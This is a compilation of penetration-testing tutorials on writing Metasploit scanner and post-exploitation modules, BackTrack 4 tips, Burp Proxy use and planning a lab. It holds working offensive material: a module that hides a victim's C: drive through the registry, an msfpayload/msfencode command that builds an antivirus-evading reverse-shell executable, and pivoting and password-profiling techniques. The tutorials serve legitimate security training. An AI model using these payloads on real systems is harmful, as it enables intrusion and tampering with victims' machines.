
How-To Tutorials - Security

174 Articles

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
Writing out a custom FTP scanner module

Let's try to build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module:

```ruby
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Apex FTP Detector',
      'Description' => '1.0',
      'Author'      => 'Nipun Jaswal',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(21),
      ], self.class)
  end
```

We start our code by defining the required libraries. The statement require 'msf/core' includes the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module, exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file, and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. The ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on.

Next, we define the module's information and attributes, such as name, description, author name, and license, in the initialize method. We also define the options required for the module to work; for example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module:

```ruby
  def run_host(target_host)
    connect(true, false)
    if(banner)
      print_status("#{rhost} is running #{banner}")
    end
    disconnect
  end
end
```

We define the run_host method, which initiates the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters to the connect function: true and false. The true parameter enables the use of global parameters, whereas false turns off the module's verbose capabilities. The beauty of the connect function lies in the way it connects to the target and automatically records the banner of the FTP service in the attribute named banner, as shown in the following screenshot:

Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and disconnect from the target.

This was an easy module, and I recommend that you try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is syntactically correct. We can do this by passing the module through a built-in Metasploit tool named msftidy, as shown in the following screenshot:

We will get a warning message indicating that there are a few extra spaces at the end of line number 19. When we remove the extra spaces and rerun msftidy, we will see that no error is generated, which confirms that the module's syntax is correct.
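As a rough illustration (a hedged sketch: the location of msftidy and the module filename vary between framework versions and setups, so the paths below are assumptions), the syntax check can be run from the framework's root directory like this:

```bash
# Run msftidy against the new module before using or submitting it.
# The framework path and the saved module path are assumptions.
cd /opt/metasploit-framework
ruby tools/msftidy.rb modules/auxiliary/scanner/ftp/apex_ftp_detector.rb
```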
Now, let's run this module and see what we gather:

We can see that the module ran successfully, and it retrieved the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules into the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements.

Writing out a custom HTTP server scanner

Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb, as shown in the following code snippet:

```ruby
require 'rex/proto/http'
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Server Service Detector',
      'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information',
      'Author'      => 'Nipun_Jaswal',
      'License'     => MSF_LICENSE
    )
  end
```

We include all the necessary library files, as we did for the previous modules, and assign general information about the module in the initialize method. Next, we define the fingerprinting methods and the run_host method, as shown in the following code snippet:

```ruby
  def os_fingerprint(response)
    if not response.headers.has_key?('Server')
      return "Unknown OS (No Server Header)"
    end
    case response.headers['Server']
    when /Win32/, /Windows/, /IIS/
      os = "Windows"
    when /Apache/
      os = "*Nix"
    else
      os = "Unknown Server Header Reporting: " + response.headers['Server']
    end
    return os
  end

  def pb_fingerprint(response)
    if not response.headers.has_key?('X-Powered-By')
      resp = "No-Response"
    else
      resp = response.headers['X-Powered-By']
    end
    return resp
  end

  def run_host(ip)
    connect
    res = send_request_raw({'uri' => '/', 'method' => 'GET' })
    return if not res
    os_info = os_fingerprint(res)
    pb = pb_fingerprint(res)
    fp = http_fingerprint(res)
    print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}")
  end
end
```

The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which fetches the response from the website or web server at / with a GET request. The fetched result is stored in the variable named res.

We pass the value of the response in res to the os_fingerprint method. This method checks whether the response has the Server key in its header; if the Server key is not present, we are presented with a message saying Unknown OS. However, if the response header has the Server key, we match it against a variety of regular expressions. If a match is made, the corresponding value of os is sent back to the calling method, where it is stored in the os_info variable.

Now, we check which technology is running on the server. We create a similar method, pb_fingerprint, but look for the X-Powered-By key rather than Server. Similarly, we check whether this key is present in the response or not. If the key is not present, the method returns No-Response; if it is present, the value of X-Powered-By is returned to the calling method and stored in the variable pb. Next, we use the http_fingerprint method that we used in the previous examples as well, and store its result in the variable fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables.
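As a quick sanity check outside Metasploit (a hedged sketch; the target address is a placeholder), the same two headers the module keys on can be pulled manually with curl:

```bash
# Fetch only the response headers and keep the ones the module inspects.
curl -sI http://192.168.75.130/ | grep -i -E '^(Server|X-Powered-By):'
```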
Let's see what output we'll get after running this module:

```
msf auxiliary(http_myscan) > run
[*] 192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Writing out post-exploitation modules

Now that we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target has been compromised successfully. So, let's begin with a simple drive disabler module, which will disable C: on the target system:

```ruby
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Registry

  def initialize
    super(
      'Name'        => 'Drive Disabler Module',
      'Description' => 'C Drive Disabler Module',
      'License'     => MSF_LICENSE,
      'Author'      => 'Nipun Jaswal'
    )
  end
```

We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. In addition, we have added include Msf::Post::Windows::Registry, which refers to the /core/post/windows/registry.rb file. This gives us the power to use registry manipulation functions with ease, using Ruby mixins. Next, we define the type of module and the intended version of Metasploit: in this case, Post denotes post-exploitation, and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define the necessary information about the module in the initialize method, just as we did for the previous modules. Let's see the remaining part of the module:

```ruby
  def run
    key1 = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\"
    print_line("Disabling C Drive")
    meterpreter_registry_setvaldata(key1, 'NoDrives', '4', 'REG_DWORD')
    print_line("Setting No Drives For C")
    meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', '4', 'REG_DWORD')
    print_line("Removing View On The Drive")
    print_line("Disabled C Drive")
  end
end # class
```

We created a variable called key1 and stored in it the path of the registry key under which we need to create values to disable the drives. As we are in a meterpreter shell after the exploitation has taken place, we use the meterpreter_registry_setvaldata function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation creates a new registry value named NoDrives of the REG_DWORD type at the path defined by key1.

However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula: 2^(n-1), where n is the drive letter's position in the alphabet. Suppose we need to disable the C drive. We know that C is the third letter of the alphabet, so we can calculate the exact bitmask value for disabling the C drive as follows: 2^(3-1) = 2^2 = 4. Therefore, the bitmask for disabling C: is 4. We also created another value, NoViewOnDrives, to disable the view of these drives, with exactly the same parameters.

Now, when we run this module, it gives the following output:

So, let's see whether we have successfully disabled C: or not:

Bingo! No C:. We successfully disabled C: from the user's view. We can create as many post-exploitation modules as we want, according to our needs. I recommend you put some extra time toward the libraries of Metasploit.
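To make the bitmask formula concrete, here is a small helper (a hedged sketch in plain bash; not part of the module) that computes 2^(n-1) for any drive letter:

```bash
# Bitmask for hiding a drive: 2^(n-1), where n is the drive letter's
# position in the alphabet (A=1, B=2, C=3, ...).
drive=C
n=$(( $(printf '%d' "'$drive") - 64 ))  # ASCII code -> position: C -> 3
echo $(( 2 ** (n - 1) ))                # prints 4 for drive C
```

To hide several drives at once, the individual bitmasks are added together; for example, A and C together would be 1 + 4 = 5.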
Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry keys under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER because of the built-in normalization, which automatically expands the key to its full form. I recommend you check the registry.rb file to see the various available methods.
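For comparison, the same value can also be written by hand from an open meterpreter session using the built-in reg command (a hedged sketch; option flags may vary between meterpreter builds):

```
meterpreter > reg setval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -v NoDrives -t REG_DWORD -d 4
```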


Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
Updating the kernel

The standard update process is enough for updating the software applications. However, sometimes you may want to update your kernel, because your existing kernel doesn't support a new device. Please remember that because the kernel is the heart of the operating system, a failed upgrade may leave your BackTrack system unbootable, so make a backup of your kernel and configuration first. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to BackTrack users, and updating with other kernel versions could disable those features.

Multiple customized installations

One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (around 300 MB to download) after you've installed it from the ISO or from the VMware image provided; the usual update commands are sketched after this section. If you have one machine and a high-speed Internet connection, there's not much to worry about. However, imagine installing BackTrack 4 on several machines, in several locations, with a slow Internet connection. The solution to this problem is to create an ISO image with all the upgrades already installed. If you then want to install BackTrack 4, you can install it from the newly created ISO image and won't have to download the big upgrade again. For the VMware image, you can solve the problem by performing the upgrade in the virtual image, then copying that updated virtual image for use in each new VMware installation.

Efficient methodology

Combining the power of two methodologies, the Open Source Security Testing Methodology Manual (OSSTMM) and the Information Systems Security Assessment Framework (ISSAF), provides a sufficient knowledge base to assess the security of an enterprise environment efficiently.

Can't find the dnsmap program

In our testing, the dnsmap-bulk script does not work because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using the nano text editor and change the following:

```
dnsmap $i
elif [[ $# -eq 2 ]]
then
dnsmap $i -r $2
```

to

```
./dnsmap $i
elif [[ $# -eq 2 ]]
then
./dnsmap $i -r $2
```

and save your changes.

fierce Version

Currently, fierce Version 1, included with BackTrack 4, is no longer maintained by its author (RSnake). He has suggested using fierce Version 2, which is still actively maintained by Jabra. fierce Version 2 is a rewrite of fierce Version 1. It also has several new features, such as virtual host detection, subdomain and extension brute forcing, a template-based output system, and XML support for integration with Nmap. Since fierce Version 2 has not been released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion checkout command:

```
# svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/
```

Make sure you are in the /pentest/enumeration directory before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.
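The upgrade mentioned under "Multiple customized installations" is performed with the standard Debian-style package commands (a hedged sketch; the exact package set pulled down depends on the repository state, and the kernel caveat above still applies):

```bash
apt-get update        # refresh the package lists from the BackTrack repositories
apt-get upgrade       # install updated versions of the installed packages
apt-get dist-upgrade  # also pull in upgrades that change dependencies
```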
Relationship between "Vulnerability" and "Exploit" A vulnerability is a security weakness found in the system which can be used by the attacker to perform unauthorized operations, while the exploit is a piece of code (proof-of-concept or PoC) written to take advantage of that vulnerability or bug in an automated fashion.   CISCO Privilege modes There are 16 different privilege modes available for the Cisco devices, ranging from 0 (most restricted level) to 15 (least restricted level). All the accounts created should have been configured to work under the specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.   Cisco Passwd Scanner The Cisco Passwd Scanner has been developed to scan the whole bunch of IP addresses in a specific network class. This class can be represented as A, B, or C in terms of network computing. Each class has it own definition for a number of hosts to be scanned. The tool is much faster and efficient in handling multiple threads in a single instance. It discovers those Cisco devices carrying default telnet password "cisco". We have found a number of Cisco devices vulnerable to default telnet password "cisco".   Common User Passwords Profiler (CUPP) As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain variable conditions, such as, the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. This all comes to guessing and breaking the password based on various password cracking techniques (dictionary or brute force method). CUPP is purely designed to generate a list of common passwords by profiling the target name, birthday, nickname, family member's information, pet name, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.   Extract particular information from the exploits list Using the power of bash commands we can manipulate the output of any text file in order to retrieve meaningful data. This can be accomplished by typing in cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv. To learn the basic shell commands please refer to an online source at: http://tldp.org/LDP/abs/html/index.html.   "inline" and "stager" type payload An inline payload is a single self-contained shell code that is to be executed with one instance of an exploit. While the stager payload creates a communication channel between the attacker and victim machine to read-off the rest of the staging shell code to perform the specific task, it is often common practice to choose stager payloads because they are much smaller in size than inline payloads.   Extending attack landscape by gaining deeper access to the target's network that is inaccessible from outside Metasploit provides a capability to view and add new routes to the destination network using the "route add targetSubnet targetSubnetMask SessionId" command (for example, route add 10.2.4.0 255.255.255.0 1). The "SessionId" is pointing to the existing meterpreter session (also called gateway) created after successful exploitation. 
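As a concrete illustration of the naming convention (a hedged sketch; the module names and the msfpayload S summary flag are as in the Metasploit 3.x framework that ships with BackTrack), the inline and staged variants of the Windows reverse shell are distinguished by an underscore versus a slash:

```bash
# Inline (single) payload: self-contained shellcode delivered in one block.
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.3 LPORT=4444 S

# Staged payload: a small stager that pulls the rest of the shellcode
# over the established connection.
./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=4444 S
```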
The "targetSubnet" is another network address (also called dual homed Ethernet IP-address) attached to our compromised host. Once you set a metasploit to route all the traffic through a compromised host session, we are then ready to penetrate further into a network which is normally non-routable from our side. This terminology is commonly known as Pivoting or Foot-holding.   Evading Antivirus Protection Using Metasploit Using a tool called msfencode located at /pentest/exploits/framework3, we can generate a self-protected executable file with encoded payload. This should be parallel to the msfpayload file generation process. A "raw" output from Msfpayload will be piped into Msfencode to use specific encoding technique before outputting the final binary. For instance, execute ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe to generate an encoded version of a reverse shell executable file. We strongly suggest you to use the "stager" type payloads instead of "inline" payloads, as they have a greater probability of success in bypassing major malware defenses due to their indefinite code signatures.   Stunnel version 3 BackTrack also comes with Stunnel version 3. The difference with Stunnel version 4 is that the version 4 uses a configuration file. If you want to run the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments. Summary In this article we will take a look at some tips and tricks to make the best use of BackTrack OS. Further resources on this subject: FAQs on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]


Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
At the top of Burp Proxy, you will notice the following three tabs:

- intercept: HTTP requests and responses that are in transit can be inspected and modified from this window
- options: proxy configuration and advanced preferences can be tuned from this window
- history: all intercepted traffic can be quickly analyzed from this window

If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, is a compact reference.

Step 1 – Intercepting web requests

After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website:

1. In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. It should read intercept is on.
2. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter.
3. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy, waiting for the user to either forward or drop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing, just as if you were interacting with the website normally.
4. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We dropped the request, so Burp Proxy did not forward it to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content.
5. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important piece of functionality, as it allows you to import the current web request into any of the other Burp tools. You can already imagine the potential of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder.

In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit.

Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities, as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK).
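Since the steps above assume the browser is already pointed at Burp, a quick way to verify the proxy chain (a hedged sketch; 127.0.0.1:8080 is Burp Proxy's default listener) is to push a request through it from the command line and watch it appear in the intercept tab:

```bash
# Send a request through Burp's default listener; with intercept on,
# it will be held in the intercept tab just like a browser request.
curl -x http://127.0.0.1:8080 http://www.packtpub.com/
```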
Step 2 – Inspecting web requests

Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters using one of the four Burp Proxy message analysis tabs:

- raw: This view displays the web request in raw format within a simple text editor. This is a very handy visualization, as it enables maximum flexibility for further changing the content.
- params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in the case of complex requests, as it allows you to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON.
- headers: Similarly, this view displays the HTTP header names and values in tabular form.
- hex: In the case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view displays the request as a traditional hex editor would.

The history tab enables you to analyze all web requests that have transited through the proxy:

1. Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version.
2. By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons.
3. Back in the history tab, Burp Proxy displays several details for each item, including the request method, URL, response code, and length.
4. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful for highlighting important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back to it later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior.
5. Click on the display filter at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection.

At this point, you may have already understood the potential of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses, as you can filter relevant traffic by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages.
Step 3 – Tampering web requests

As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application's responses. For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) into all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge of common web application vulnerabilities, the OWASP Top Ten Project at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point.

Tampering with web requests in Burp is as easy as editing strings in a text editor:

1. Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP.
2. Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request.
3. From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the GET parameter keys from ASP to PHP. Edit the request to look like the following:

```
GET /books/all?keys=PHP HTTP/1.1
Host: www.packtpub.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
```

4. Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page.

Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy views. For example, in the params view, it is possible to add a new parameter by:

1. Clicking on new (right side) in the Burp Proxy params view.
2. Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters.
3. Typing the name and the value of the newly created parameter.
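For reference (a hedged sketch; the search URL is taken from the steps above), the tampered request is equivalent to issuing the modified query directly, which is a handy way to double-check the server's behavior outside the proxy:

```bash
# Issue the modified search query directly; the response should match
# what the browser received after the request was edited and forwarded.
curl 'http://www.packtpub.com/books/all?keys=PHP'
```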
Advanced features

After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations.

Match and replace

Let's imagine that you are testing an application designed for mobile devices using a standard browser on your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will find the match and replace function provided by Burp Proxy very useful. Let's configure Burp Proxy to tamper with the user-agent HTTP header field:

1. In the options tab of Burp Proxy, scroll down to the match and replace section.
2. Under the match and replace table, a drop-down list and two text fields allow you to create a customized rule. Select request header from the drop-down list, since we want to create a match condition pertaining to HTTP requests.
3. Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart.html.
4. In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3, or any other fake user-agent that you want to impersonate.
5. Click add and verify that the new match has been added to the list.
6. Intercept a request, let it pass through the proxy, and verify that it has been automatically modified by the tool.

HTML modification

Another interesting feature of Burp Proxy is automatic HTML modification, which can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify the HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser to submit invalid data. This function can also be used to display hidden form fields. Let's see in practice how you can activate this feature:

1. In Burp Proxy, go to options and scroll down to the HTML modification section. Numerous options are available here:
   - unhide hidden form fields: display hidden HTML form fields
   - enable disabled form fields: submit all input forms present inside the HTML page
   - remove input field length limits: allow extra-long strings in text fields
   - remove JavaScript form validation: make Burp Proxy strip the onsubmit handler JavaScript functions from HTML forms
   - remove all JavaScript: completely remove all JS scripts
   - remove object tags: remove embedded objects within the HTML document
2. Select the desired checkboxes to activate automatic HTML modification.

Summary

Using this feature, you will be able to understand whether the web application enforces server-side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser.

Resources for Article: Further resources on this subject: Visual Studio 2010 Test Types [Article], Ordered and Generic Tests in Visual Studio 2010 [Article], Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]


Planning the lab environment

Packt
12 Apr 2013
10 min read
Getting ready

To get the best result after setting up your lab, you should plan it properly first. Your lab will be used to practise certain penetration testing skills, so in order to plan it properly, you should first consider which skills you want to practise. Although you could have uncommon or even unique reasons to build a lab, the average list of skills one might need to practise is as follows:

Essential skills:
- Discovery techniques
- Enumeration techniques
- Scanning techniques
- Network vulnerability exploitation
- Privilege escalation
- OWASP TOP 10 vulnerabilities discovery and exploitation
- Password and hash attacks
- Wireless attacks

Additional skills:
- Modifying and testing exploits
- Tunneling
- Fuzzing
- Vulnerability research
- Documenting the penetration testing process

All these skills are applied in real-life penetration testing projects, depending on the project's depth and the penetration tester's qualifications. These skills can be practised in three lab types, or combinations of them:

- Network security lab
- Web application lab
- Wi-Fi lab

The lab planning process for each of the three lab types consists of the same four phases:

1. Determining the lab environment requirements: This phase helps you to understand what your lab should include. All the necessary lab environment components should be listed, and their importance for practising different penetration testing skills should be assessed.
2. Determining the lab environment size: The number of each lab environment component is defined in this phase.
3. Determining the required resources: The point of this phase is to choose which hardware and software could be used for building the lab with the specified parameters, and to fit it with what you actually have or are able to get.
4. Determining the lab environment architecture: This phase designs the network topology and network address space.

How to do it...
Now, I want to describe, step by step, how to plan a combined lab covering all three lab types listed in the preceding section, using the four-phase approach:

1. Determine the lab environment requirements. To fit our goal and practise particular skills, the lab should contain the following components (skills to practise, followed by the necessary components):

- Discovery, enumeration, and scanning techniques; network vulnerability exploitation: several different hosts with various OSs, a firewall, an IPS
- OWASP TOP 10 vulnerabilities discovery and exploitation: web server, web application, database server, Web Application Firewall
- Password and hash attacks: workstations, servers, domain controller, FTP server
- Wireless attacks: wireless router, radius server, laptop or any other host with a Wi-Fi adapter
- Modifying and testing exploits; fuzzing: any host, a vulnerable network service, a debugger
- Privilege escalation: any host
- Tunnelling: several hosts
- Vulnerability research; documenting the penetration testing process: specialized software

Now, we can make our component list and define the importance of each component for our lab (importance ranges from Additional, less important, through Important, to Essential, most important):

- Windows server: Essential
- Linux server: Important
- FreeBSD server: Additional
- Domain controller: Important
- Web server: Essential
- FTP server: Important
- Web site: Essential
- Web 2.0 application: Important
- Web Application Firewall: Additional
- Database server: Essential
- Windows workstation: Essential
- Linux workstation: Additional
- Laptop or any other host with a Wi-Fi adapter: Essential
- Wireless router: Essential
- Radius server: Important
- Firewall: Important
- IPS: Additional
- Debugger: Additional

2. Determine the lab environment size. In this step, we decide how many instances of each component we need in our lab. We will count only the Essential and Important components, so let's exclude all Additional components. This leaves us with the following numbers:

- Windows server: 2
- Linux server: 1
- Domain controller: 1
- Web server: 1
- FTP server: 1
- Web site: 1
- Web 2.0 application: 1
- Database server: 1
- Windows workstation: 2
- Host with Wi-Fi adapter: 2
- Wireless router: 1
- Radius server: 1
- Firewall: 2

3. Determine the required resources:

- Server and victim workstations will be virtual machines based on VMware Workstation 8.0. To run the virtual machines without any trouble, you will need an appropriate hardware platform based on a CPU with two or more cores and at least 4 GB of RAM.
- Windows servers will run Microsoft Windows Server 2008 and Microsoft Windows Server 2003.
- We will use Ubuntu 12.04 LTS as the Linux server OS.
- Workstations will run Microsoft Windows XP SP3 and Microsoft Windows 7.
- An ASUS WL-520gc will be used as the LAN and WLAN router.
- Any laptop will serve as the attacker's host.
- A Samsung Galaxy Tab (or another device supporting Wi-Fi) will act as the Wi-Fi victim.
- We will use free software for the web server, FTP server, and web application, so no hardware or financial resources are needed to meet these requirements.

4. Determine the lab environment architecture. Now, we need to design our lab network and draw a scheme. The address space parameters are:

- DHCP server: 192.168.1.1
- Gateway: 192.168.1.1
- Address pool: 192.168.1.2-15
- Subnet mask: 255.255.255.0
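Once the lab is running, a quick sanity check of this address plan (a hedged sketch; nmap is assumed to be installed on the attacker's laptop) is to ping-sweep the subnet and confirm that hosts picked up addresses from the pool:

```bash
# Ping-sweep the lab subnet; hosts from the 192.168.1.2-15 pool should answer.
nmap -sn 192.168.1.0/24
```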
How it works...

In the first step, we discovered which types of lab components we need by determining what could be used to practise the following skills:

- All OSs and network services are suitable for practising discovery, enumeration, and scanning techniques, and also for network vulnerability exploitation.
- We also need at least two firewalls: the Windows built-in software firewall and the router's built-in firewall functions. Firewalls are necessary for learning different scanning techniques and firewall rule detection. Additionally, you can use any IPS for practising evasion techniques.
- A web server, a website, and a web application are necessary for learning how to disclose and exploit OWASP TOP 10 vulnerabilities. Though a Web Application Firewall (WAF) is not necessary, it helps raise web penetration testing skills to a higher level.
- An FTP service is ideal for practising password brute forcing. Microsoft domain services are necessary for understanding and trying Windows domain password and hash attacks, including relaying. This is why we need at least one network service with remote password authentication and at least one Windows domain controller with two Windows workstations.
- A wireless access point is essential for performing various wireless attacks, but it is better to combine the LAN router and Wi-Fi access point in one device, so we will use a Wi-Fi router with several LAN ports. A radius server is necessary for practising attacks on WLANs with WPA-Enterprise security. A laptop and a tablet PC with Wi-Fi adapters will act as the attacker and the victim in wireless attacks.
- Tunnelling techniques can be practised on any two hosts; it does not matter whether we use Windows or any other OS.
- Testing and modifying exploits, as well as fuzzing and vulnerability research, need a debugger installed on a vulnerable host.
- To properly document a penetration testing process, one can use any text processor software, but there are several specialized software solutions that make things much more comfortable and easier.

In the second step, we determined which software and hardware we can use as instances of the chosen component types and set their importance, based on a common lab for a penetration tester at a basic or intermediate professional level.

In the third step, we worked out which solutions are suitable for our tasks and what we can afford. I have tried to choose the cheaper option, which is why I am going to use virtualization software. The ASUS WL-520gc router combines a LAN router and a Wi-Fi access point in the same device, so it is cheaper and more convenient than using dedicated devices. A laptop and a tablet PC were also chosen for practising wireless attacks, but this is not the cheapest solution.

